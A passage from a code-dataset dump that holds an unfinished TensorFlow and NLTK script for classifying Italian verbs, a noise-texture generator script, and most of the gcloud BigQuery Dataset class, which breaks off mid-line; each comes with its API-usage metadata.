"line_number": 27, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.all", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 31, "usage_type": "name"}, {"api_name": "serializers.GroupSerializer", "line_number": 32, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Idea.objects.all", "line_number": 38, "usage_type": "call"}, {"api_name": "models.Idea.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.Idea", "line_number": 38, "usage_type": "name"}, {"api_name": "serializers.IdeaSerializer", "line_number": 40, "usage_type": "name"}, {"api_name": "permissions.IsOwnerOrReadOnly", "line_number": 41, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 47, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 47, "usage_type": "name"}, {"api_name": "serializers.IdeaSerializer", "line_number": 48, "usage_type": "name"}, {"api_name": "models.Idea.objects.filter", "line_number": 51, "usage_type": "call"}, {"api_name": "models.Idea.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "models.Idea", "line_number": 51, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 54, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 54, "usage_type": "name"}, {"api_name": "serializers.IdeaSerializer", "line_number": 55, "usage_type": "name"}, {"api_name": "models.Version.objects.all", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Version.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "models.Version", "line_number": 58, "usage_type": "name"}, {"api_name": "models.Idea.objects.filter", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Idea.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.Idea", "line_number": 59, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 62, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 62, "usage_type": "name"}, {"api_name": "serializers.HistorySerializer", "line_number": 63, "usage_type": "name"}, {"api_name": "models.Version.objects.all", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Version.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.Version", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 70, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 82, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 82, "usage_type": "name"}, {"api_name": "models.Version.objects.all", "line_number": 88, "usage_type": "call"}, {"api_name": "models.Version.objects", "line_number": 88, "usage_type": "attribute"}, {"api_name": "models.Version", "line_number": 88, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 91, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 97, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 97, "usage_type": "name"}, {"api_name": "models.Version", "line_number": 98, "usage_type": "name"}, {"api_name": "models.Version.objects.all", "line_number": 102, "usage_type": "call"}, {"api_name": "models.Version.objects", "line_number": 102, "usage_type": "attribute"}, {"api_name": "models.Version", "line_number": 102, "usage_type": "name"}, {"api_name": "django.views.generic.ListView", "line_number": 105, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 105, "usage_type": "name"}, {"api_name": "models.Idea", "line_number": 107, "usage_type": "name"}, {"api_name": "models.Version.objects.all", "line_number": 111, "usage_type": "call"}, {"api_name": "models.Version.objects", "line_number": 111, "usage_type": "attribute"}, {"api_name": "models.Version", "line_number": 111, "usage_type": "name"}, {"api_name": "models.Idea.objects.filter", "line_number": 112, "usage_type": "call"}, {"api_name": "models.Idea.objects", "line_number": 112, "usage_type": "attribute"}, {"api_name": "models.Idea", "line_number": 112, "usage_type": "name"}, {"api_name": "django.views.generic.View", "line_number": 115, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 115, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 119, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 122, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 122, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 126, "usage_type": "call"}, {"api_name": "forms.IdeaForm", "line_number": 138, "usage_type": "call"}, {"api_name": "models.Player.objects.all", "line_number": 139, "usage_type": "call"}, {"api_name": "models.Player.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "models.Player", "line_number": 139, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 143, "usage_type": "call"}, {"api_name": "models.Version.objects.all", "line_number": 148, "usage_type": "call"}, {"api_name": "models.Version.objects", "line_number": 148, "usage_type": "attribute"}, {"api_name": "models.Version", "line_number": 148, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 154, "usage_type": "call"}, {"api_name": "forms.IdeaForm", "line_number": 156, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 157, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 135, "usage_type": "call"}, {"api_name": "django.views.generic.DetailView", "line_number": 160, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 160, "usage_type": "name"}, {"api_name": "models.Idea", "line_number": 161, "usage_type": "name"}, {"api_name": "forms.SignUpForm", "line_number": 167, "usage_type": "call"}, {"api_name": "models.Player.DoesNotExist", "line_number": 171, "usage_type": "attribute"}, {"api_name": "models.Player", "line_number": 171, "usage_type": "name"}, {"api_name": "models.Player", "line_number": 172, "usage_type": "call"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 176, "usage_type": "call"}, {"api_name": "django.utils.encoding.force_text", "line_number": 178, "usage_type": "call"}, {"api_name": "django.utils.http.urlsafe_base64_encode", "line_number": 178, "usage_type": "call"}, {"api_name": "django.utils.encoding.force_bytes", "line_number": 178, "usage_type": "call"}, {"api_name": "django.template.loader.render_to_string", "line_number": 179, "usage_type": "call"}, {"api_name": "tokens.account_activation_token.make_token", "line_number": 184, "usage_type": "call"}, {"api_name": "tokens.account_activation_token", "line_number": 184, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 187, "usage_type": "call"}, {"api_name": "forms.SignUpForm", "line_number": 189, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 190, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 194, "usage_type": "call"}, {"api_name": "django.utils.http.urlsafe_base64_decode", "line_number": 199, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 200, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 200, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 200, "usage_type": "name"}, {"api_name": "models.Player.DoesNotExist", "line_number": 201, "usage_type": "attribute"}, {"api_name": "models.Player", "line_number": 201, "usage_type": "name"}, {"api_name": "tokens.account_activation_token.check_token", "line_number": 204, "usage_type": "call"}, {"api_name": "tokens.account_activation_token", "line_number": 204, "usage_type": "name"}, {"api_name": "django.contrib.auth.login", "line_number": 208, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 209, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 211, "usage_type": "call"}]} +{"seq_id": "483422247", "text": "'''\nA Multilayer Perceptron implementation example using TensorFlow library.\nThis example is using the MNIST database of handwritten digits\n(http://yann.lecun.com/exdb/mnist/)\nAuthor: Aymeric Damien\nProject: https://github.com/aymericdamien/TensorFlow-Examples/\n'''\n\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport csv\n\n\n\n\nimport pandas as pd\n\n# TODO\n\n# load data from dataset and create wrapper functions for batching\n\n# input and output dimensions are read from dataset\n\ntraining = 'training.csv'\ntest = 'test.csv'\nconfiguration = 'configuration.ini'\n\n\n# read configuration file\nwith open (configuration, 'r') as f:\n config = [int(w) for w in [x.strip() for x in f.readlines()]]\ninputnode = config[1]\noutputnode = config[-1]\n\ndef ReadInput (dataline):\n return [dataline[i] for i in range(1,config[1])]\n\ndef ReadOutput (dataline):\n return [dataline[i] for i in range ((config[1]+1),len(dataline))] # read out only the last cell that represent the output vector\n\ndef LoadCsvDataFrame (filename):\n vectors = {}\n infile = open(filename, \"r\")\n reader = csv.reader(infile, delimiter=';', quoting=csv.QUOTE_NONNUMERIC)\n for row in reader:\n vectors[row[0]] = row[1:]\n vectors[row[0]] = {'inputVector': ReadInput(row), 'outputVector':ReadOutput(row), 'outLabel': row[config[1]]}\n \n return vectors \na=LoadCsvDataFrame(test)\n\n\n# ATTENTION!!1 LOST ONE CELL AND I DO NOT UNDERSTAND WHERE! INPUT VECTOR LEN < DI 1\n\ntraining = LoadCsvDataFrame(training)\ntest = LoadCsvDataFrame(test)\n\n\n\n\ndef FeaturesExtractor (word):\n f1 = word[-1] # last character\n f2 = word[-2:] # last 2 char\n f3 = word[-3:]\n f4 = word[0]\n f5 = word[:1]\n f6 = word[:2]\n \n return {'f1':f1,'f2':f2,'f3':f3,'f4':f4,'f5':f5,'f6':f6}\n\nw='mangiavo'\nprint (FeaturesExtractor(w))\n\n\n\n\n\n\n\n\nimport nltk\nfeaturesets = [(FeaturesExtractor(w),training[w]['outLabel'] ) for w in training.keys()]\ntrain_set, test_set = featuresets[500:], featuresets[:500]\nclassifier = nltk.NaiveBayesClassifier.train(train_set)\n\n#>>> classifier.classify(FeaturesExtractor('mangiavo'))\n#'VER'\n#>>> classifier.classify(FeaturesExtractor('mangiavamo'))\n#'VER'\n#>>> classifier.classify(FeaturesExtractor('mangiai'))\n#'ADJ'\n#>>> classifier.classify(FeaturesExtractor('mangiai'))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# Parameters\nlearning_rate = 0.001\ntraining_epochs = 15\nbatch_size = 100\ndisplay_step = 1\n\n# Network Parameters\nn_hidden_1 =500 # 256 # 1st layer number of features\nn_hidden_2 = 256 # 2nd layer number of features\nn_input = config[1]# 784 # MNIST data input (img shape: 28*28)\nn_classes = config[-1] #10 # MNIST total classes (0-9 digits)\n\n# tf Graph input\nx = tf.placeholder(\"float\", [None, n_input])\ny = tf.placeholder(\"float\", [None, n_classes])\n\n\n# Create model\ndef multilayer_perceptron(x, weights, biases):\n # Hidden layer with RELU activation\n layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])\n layer_1 = tf.nn.relu(layer_1)\n # Hidden layer with RELU activation\n layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])\n layer_2 = tf.nn.relu(layer_2)\n # Output layer with linear activation\n out_layer = tf.matmul(layer_2, weights['out']) + biases['out']\n return out_layer\n\n# Store layers weight & bias\nweights = {\n 'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),\n 'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),\n 'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))\n}\nbiases = {\n 'b1': tf.Variable(tf.random_normal([n_hidden_1])),\n 'b2': tf.Variable(tf.random_normal([n_hidden_2])),\n 'out': tf.Variable(tf.random_normal([n_classes]))\n}\n\n# Construct model\npred = multilayer_perceptron(x, weights, biases)\n\n# Define loss and optimizer\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n# Initializing the variables\ninit = tf.global_variables_initializer()\n\n\n## continuare da qui con funztione che gestiste batching\n## Launch the graph\n#with tf.Session() as sess:\n# sess.run(init)\n#\n# # Training cycle\n# for epoch in range(training_epochs):\n# avg_cost = 0.\n# total_batch = int(mnist.train.num_examples/batch_size)\n# print('total batch', total_batch)\n# # Loop over all batches\n# for i in range(total_batch):\n# batch_x, batch_y = mnist.train.next_batch(1)#batch_size)\n## with open('batch_x.txt','a') as fx:\n## for i in range(len(batch_x)):\n### print (len(batch_x))\n# print (batch_x[0])\n# print \n# print \n# \n### print\n#### print (batch_x[1])\n### with open('batch_y.txt','a') as fy:\n### fx.write(str(batch_x[1]))\n### fy.write(str(batch_y[1]))\n# print (len(batch_y[0]))\n## break\n## \n# # Run optimization op (backprop) and cost op (to get loss value)\n# _, c = sess.run([optimizer, cost], feed_dict={x: batch_x,\n# y: batch_y})\n# # Compute average loss\n# avg_cost += c / total_batch\n# # Display logs per epoch step\n# if epoch % display_step == 0:\n# print(\"Epoch:\", '%04d' % (epoch+1), \"cost=\", \\\n# \"{:.9f}\".format(avg_cost))\n# print(\"Optimization Finished!\")\n#\n# # Test model\n# correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\n# # Calculate accuracy\n# accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n# print(\"Accuracy:\", accuracy.eval({x: mnist.test.images, y: mnist.test.labels}))", "sub_path": "prova/PredictionVerb_NN_in_development.py", "file_name": "PredictionVerb_NN_in_development.py", "file_ext": "py", "file_size_in_byte": 5808, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 45, "usage_type": "call"}, {"api_name": "csv.QUOTE_NONNUMERIC", "line_number": 45, "usage_type": "attribute"}, {"api_name": "nltk.NaiveBayesClassifier.train", "line_number": 85, "usage_type": "call"}, {"api_name": "nltk.NaiveBayesClassifier", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.add", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 130, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 133, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 145, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 145, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 147, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 147, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 154, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 154, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 154, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 155, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 155, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 158, "usage_type": "call"}]} +{"seq_id": "361642575", "text": "#\n# script to build texture for \"Third Space\" effect\n#\n# Author: Alex V. Boreskoff\n#\n\nimport noise\nimport Image\nimport math\n\nsize = 256\ninv = 1.0 / size\n\n\nim = Image.new ( \"RGB\", (size, size) )\n\nredOffs = ( 1.3579, 0.25672, 0.4567 )\ngreenOffs = ( 2.4786, 1.54567, 2.654 )\nblueOffs = ( 3.5795, 2.16713, 1.0912 )\n\n # now build the texture\nfor x in range ( size ):\n for y in range ( size ):\n x1 = inv * x\n y1 = inv * y\n\n # get func value based on noise\n n = ( 1 + noise.noise ( redOffs [0] + 35*x1, redOffs [1] + 4*y1, redOffs [2] ) ) * 0.15;\n v = (y1 + n) * 0.5\n\n if v < 0:\n v = 1.0\n\n im.putpixel ( (x,y), (255*v, 0, 0) )\n\nim.show ()\nim.save ( \"ThirdSpace.bmp\", \"bmp\" )\n", "sub_path": "Thin film Interference/Code/scripts/gen-3s-texture.py", "file_name": "gen-3s-texture.py", "file_ext": "py", "file_size_in_byte": 767, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "Image.new", "line_number": 15, "usage_type": "call"}, {"api_name": "noise.noise", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "209471164", "text": "# Copyright 2015 Google Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Define API Datasets.\"\"\"\nimport six\n\nfrom gcloud._helpers import _datetime_from_microseconds\nfrom gcloud.exceptions import NotFound\nfrom gcloud.bigquery.table import Table\n\n\nclass AccessGrant(object):\n \"\"\"Represent grant of an access role to an entity.\n\n :type role: string (one of 'OWNER', 'WRITER', 'READER').\n :param role: role granted to the entity.\n\n :type entity_type: string (one of 'specialGroup', 'groupByEmail', or\n 'userByEmail')\n :param entity_type: type of entity being granted the role.\n\n :type entity_id: string\n :param entity_id: ID of entity being granted the role.\n \"\"\"\n def __init__(self, role, entity_type, entity_id):\n self.role = role\n self.entity_type = entity_type\n self.entity_id = entity_id\n\n def __repr__(self):\n return '' % (\n self.role, self.entity_type, self.entity_id)\n\n\nclass Dataset(object):\n \"\"\"Datasets are containers for tables.\n\n See:\n https://cloud.google.com/bigquery/docs/reference/v2/datasets\n\n :type name: string\n :param name: the name of the dataset\n\n :type client: :class:`gcloud.bigquery.client.Client`\n :param client: A client which holds credentials and project configuration\n for the dataset (which requires a project).\n\n :type access_grants: list of :class:`AccessGrant`\n :param access_grants: roles granted to entities for this dataset\n \"\"\"\n\n def __init__(self, name, client, access_grants=()):\n self.name = name\n self._client = client\n self._properties = {}\n self.access_grants = access_grants\n\n @property\n def project(self):\n \"\"\"Project bound to the dataset.\n\n :rtype: string\n :returns: the project (derived from the client).\n \"\"\"\n return self._client.project\n\n @property\n def path(self):\n \"\"\"URL path for the dataset's APIs.\n\n :rtype: string\n :returns: the path based on project and dataste name.\n \"\"\"\n return '/projects/%s/datasets/%s' % (self.project, self.name)\n\n @property\n def access_grants(self):\n \"\"\"Dataset's access grants.\n\n :rtype: list of :class:`AccessGrant`\n :returns: roles granted to entities for this dataset\n \"\"\"\n return list(self._access_grants)\n\n @access_grants.setter\n def access_grants(self, value):\n \"\"\"Update dataset's access grants\n\n :type value: list of :class:`AccessGrant`\n :param value: roles granted to entities for this dataset\n\n :raises: TypeError if 'value' is not a sequence, or ValueError if\n any item in the sequence is not an AccessGrant\n \"\"\"\n if not all(isinstance(field, AccessGrant) for field in value):\n raise ValueError('Values must be AccessGrant instances')\n self._access_grants = tuple(value)\n\n @property\n def created(self):\n \"\"\"Datetime at which the dataset was created.\n\n :rtype: ``datetime.datetime``, or ``NoneType``\n :returns: the creation time (None until set from the server).\n \"\"\"\n creation_time = self._properties.get('creationTime')\n if creation_time is not None:\n # creation_time will be in milliseconds.\n return _datetime_from_microseconds(1000.0 * creation_time)\n\n @property\n def dataset_id(self):\n \"\"\"ID for the dataset resource.\n\n :rtype: string, or ``NoneType``\n :returns: the ID (None until set from the server).\n \"\"\"\n return self._properties.get('id')\n\n @property\n def etag(self):\n \"\"\"ETag for the dataset resource.\n\n :rtype: string, or ``NoneType``\n :returns: the ETag (None until set from the server).\n \"\"\"\n return self._properties.get('etag')\n\n @property\n def modified(self):\n \"\"\"Datetime at which the dataset was last modified.\n\n :rtype: ``datetime.datetime``, or ``NoneType``\n :returns: the modification time (None until set from the server).\n \"\"\"\n modified_time = self._properties.get('lastModifiedTime')\n if modified_time is not None:\n # modified_time will be in milliseconds.\n return _datetime_from_microseconds(1000.0 * modified_time)\n\n @property\n def self_link(self):\n \"\"\"URL for the dataset resource.\n\n :rtype: string, or ``NoneType``\n :returns: the URL (None until set from the server).\n \"\"\"\n return self._properties.get('selfLink')\n\n @property\n def default_table_expiration_ms(self):\n \"\"\"Default expiration time for tables in the dataset.\n\n :rtype: integer, or ``NoneType``\n :returns: The time in milliseconds, or None (the default).\n \"\"\"\n return self._properties.get('defaultTableExpirationMs')\n\n @default_table_expiration_ms.setter\n def default_table_expiration_ms(self, value):\n \"\"\"Update default expiration time for tables in the dataset.\n\n :type value: integer, or ``NoneType``\n :param value: new default time, in milliseconds\n\n :raises: ValueError for invalid value types.\n \"\"\"\n if not isinstance(value, six.integer_types) and value is not None:\n raise ValueError(\"Pass an integer, or None\")\n self._properties['defaultTableExpirationMs'] = value\n\n @property\n def description(self):\n \"\"\"Description of the dataset.\n\n :rtype: string, or ``NoneType``\n :returns: The description as set by the user, or None (the default).\n \"\"\"\n return self._properties.get('description')\n\n @description.setter\n def description(self, value):\n \"\"\"Update description of the dataset.\n\n :type value: string, or ``NoneType``\n :param value: new description\n\n :raises: ValueError for invalid value types.\n \"\"\"\n if not isinstance(value, six.string_types) and value is not None:\n raise ValueError(\"Pass a string, or None\")\n self._properties['description'] = value\n\n @property\n def friendly_name(self):\n \"\"\"Title of the dataset.\n\n :rtype: string, or ``NoneType``\n :returns: The name as set by the user, or None (the default).\n \"\"\"\n return self._properties.get('friendlyName')\n\n @friendly_name.setter\n def friendly_name(self, value):\n \"\"\"Update title of the dataset.\n\n :type value: string, or ``NoneType``\n :param value: new title\n\n :raises: ValueError for invalid value types.\n \"\"\"\n if not isinstance(value, six.string_types) and value is not None:\n raise ValueError(\"Pass a string, or None\")\n self._properties['friendlyName'] = value\n\n @property\n def location(self):\n \"\"\"Location in which the dataset is hosted.\n\n :rtype: string, or ``NoneType``\n :returns: The location as set by the user, or None (the default).\n \"\"\"\n return self._properties.get('location')\n\n @location.setter\n def location(self, value):\n \"\"\"Update location in which the dataset is hosted.\n\n :type value: string, or ``NoneType``\n :param value: new location\n\n :raises: ValueError for invalid value types.\n \"\"\"\n if not isinstance(value, six.string_types) and value is not None:\n raise ValueError(\"Pass a string, or None\")\n self._properties['location'] = value\n\n @classmethod\n def from_api_repr(cls, resource, client):\n \"\"\"Factory: construct a dataset given its API representation\n\n :type resource: dict\n :param resource: dataset resource representation returned from the API\n\n :type client: :class:`gcloud.bigquery.client.Client`\n :param client: Client which holds credentials and project\n configuration for the dataset.\n\n :rtype: :class:`gcloud.bigquery.dataset.Dataset`\n :returns: Dataset parsed from ``resource``.\n \"\"\"\n if ('datasetReference' not in resource or\n 'datasetId' not in resource['datasetReference']):\n raise KeyError('Resource lacks required identity information:'\n '[\"datasetReference\"][\"datasetId\"]')\n name = resource['datasetReference']['datasetId']\n dataset = cls(name, client=client)\n dataset._set_properties(resource)\n return dataset\n\n def _require_client(self, client):\n \"\"\"Check client or verify over-ride.\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n\n :rtype: :class:`gcloud.bigquery.client.Client`\n :returns: The client passed in or the currently bound client.\n \"\"\"\n if client is None:\n client = self._client\n return client\n\n def _parse_access_grants(self, access):\n \"\"\"Parse a resource fragment into a set of access grants.\n\n :type access: list of mappings\n :param access: each mapping represents a single access grant\n\n :rtype: list of :class:`AccessGrant`\n :returns: a list of parsed grants\n \"\"\"\n result = []\n for grant in access:\n grant = grant.copy()\n role = grant.pop('role')\n # Hypothetical case: we don't know that the back-end will ever\n # return such structures, but they are logical. See:\n # https://github.com/GoogleCloudPlatform/gcloud-python/pull/1046#discussion_r36687769\n for entity_type, entity_id in sorted(grant.items()):\n result.append(\n AccessGrant(role, entity_type, entity_id))\n return result\n\n def _set_properties(self, api_response):\n \"\"\"Update properties from resource in body of ``api_response``\n\n :type api_response: httplib2.Response\n :param api_response: response returned from an API call\n \"\"\"\n self._properties.clear()\n cleaned = api_response.copy()\n access = cleaned.pop('access', ())\n self.access_grants = self._parse_access_grants(access)\n if 'creationTime' in cleaned:\n cleaned['creationTime'] = float(cleaned['creationTime'])\n if 'lastModifiedTime' in cleaned:\n cleaned['lastModifiedTime'] = float(cleaned['lastModifiedTime'])\n self._properties.update(cleaned)\n\n def _build_access_resource(self):\n \"\"\"Generate a resource fragment for dataset's access grants.\"\"\"\n result = []\n for grant in self.access_grants:\n info = {'role': grant.role, grant.entity_type: grant.entity_id}\n result.append(info)\n return result\n\n def _build_resource(self):\n \"\"\"Generate a resource for ``create`` or ``update``.\"\"\"\n resource = {\n 'datasetReference': {\n 'projectId': self.project, 'datasetId': self.name},\n }\n if self.default_table_expiration_ms is not None:\n value = self.default_table_expiration_ms\n resource['defaultTableExpirationMs'] = value\n\n if self.description is not None:\n resource['description'] = self.description\n\n if self.friendly_name is not None:\n resource['friendlyName'] = self.friendly_name\n\n if self.location is not None:\n resource['location'] = self.location\n\n if len(self.access_grants) > 0:\n resource['access'] = self._build_access_resource()\n\n return resource\n\n def create(self, client=None):\n \"\"\"API call: create the dataset via a PUT request\n\n See:\n https://cloud.google.com/bigquery/reference/rest/v2/tables/insert\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n \"\"\"\n client = self._require_client(client)\n path = '/projects/%s/datasets' % (self.project,)\n api_response = client.connection.api_request(\n method='POST', path=path, data=self._build_resource())\n self._set_properties(api_response)\n\n def exists(self, client=None):\n \"\"\"API call: test for the existence of the dataset via a GET request\n\n See\n https://cloud.google.com/bigquery/docs/reference/v2/datasets/get\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n \"\"\"\n client = self._require_client(client)\n\n try:\n client.connection.api_request(method='GET', path=self.path,\n query_params={'fields': 'id'})\n except NotFound:\n return False\n else:\n return True\n\n def reload(self, client=None):\n \"\"\"API call: refresh dataset properties via a GET request\n\n See\n https://cloud.google.com/bigquery/docs/reference/v2/datasets/get\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n \"\"\"\n client = self._require_client(client)\n\n api_response = client.connection.api_request(\n method='GET', path=self.path)\n self._set_properties(api_response)\n\n def patch(self, client=None, **kw):\n \"\"\"API call: update individual dataset properties via a PATCH request\n\n See\n https://cloud.google.com/bigquery/docs/reference/v2/datasets/patch\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n\n :type kw: ``dict``\n :param kw: properties to be patched.\n\n :raises: ValueError for invalid value types.\n \"\"\"\n client = self._require_client(client)\n\n partial = {}\n\n if 'default_table_expiration_ms' in kw:\n value = kw['default_table_expiration_ms']\n if not isinstance(value, six.integer_types) and value is not None:\n raise ValueError(\"Pass an integer, or None\")\n partial['defaultTableExpirationMs'] = value\n\n if 'description' in kw:\n partial['description'] = kw['description']\n\n if 'friendly_name' in kw:\n partial['friendlyName'] = kw['friendly_name']\n\n if 'location' in kw:\n partial['location'] = kw['location']\n\n api_response = client.connection.api_request(\n method='PATCH', path=self.path, data=partial)\n self._set_properties(api_response)\n\n def update(self, client=None):\n \"\"\"API call: update dataset properties via a PUT request\n\n See\n https://cloud.google.com/bigquery/docs/reference/v2/datasets/update\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n \"\"\"\n client = self._require_client(client)\n api_response = client.connection.api_request(\n method='PUT', path=self.path, data=self._build_resource())\n self._set_properties(api_response)\n\n def delete(self, client=None):\n \"\"\"API call: delete the dataset via a DELETE request\n\n See:\n https://cloud.google.com/bigquery/reference/rest/v2/datasets/delete\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n \"\"\"\n client = self._require_client(client)\n client.connection.api_request(method='DELETE', path=self.path)\n\n def list_tables(self, max_results=None, page_token=None):\n \"\"\"List tables for the project associated with this client.\n\n See:\n https://cloud.google.com/bigquery/docs/reference/v2/tables/list\n\n :type max_results: int\n :param max_results: maximum number of tables to return, If not\n passed, defaults to a value set by the API.\n\n :type page_token: string\n :param page_token: opaque marker for the next \"page\" of datasets. If\n not passed, the API will return the first page of\n datasets.\n\n :rtype: tuple, (list, str)\n :returns: list of :class:`gcloud.bigquery.table.Table`, plus a\n \"next page token\" string: if not None, indicates that\n more tables can be retrieved with another call (pass that\n value as ``page_token``).\n \"\"\"\n params = {}\n\n if max_results is not None:\n params['maxResults'] = max_results\n\n if page_token is not None:\n params['pageToken'] = page_token\n\n path = '/projects/%s/datasets/%s/tables' % (self.project, 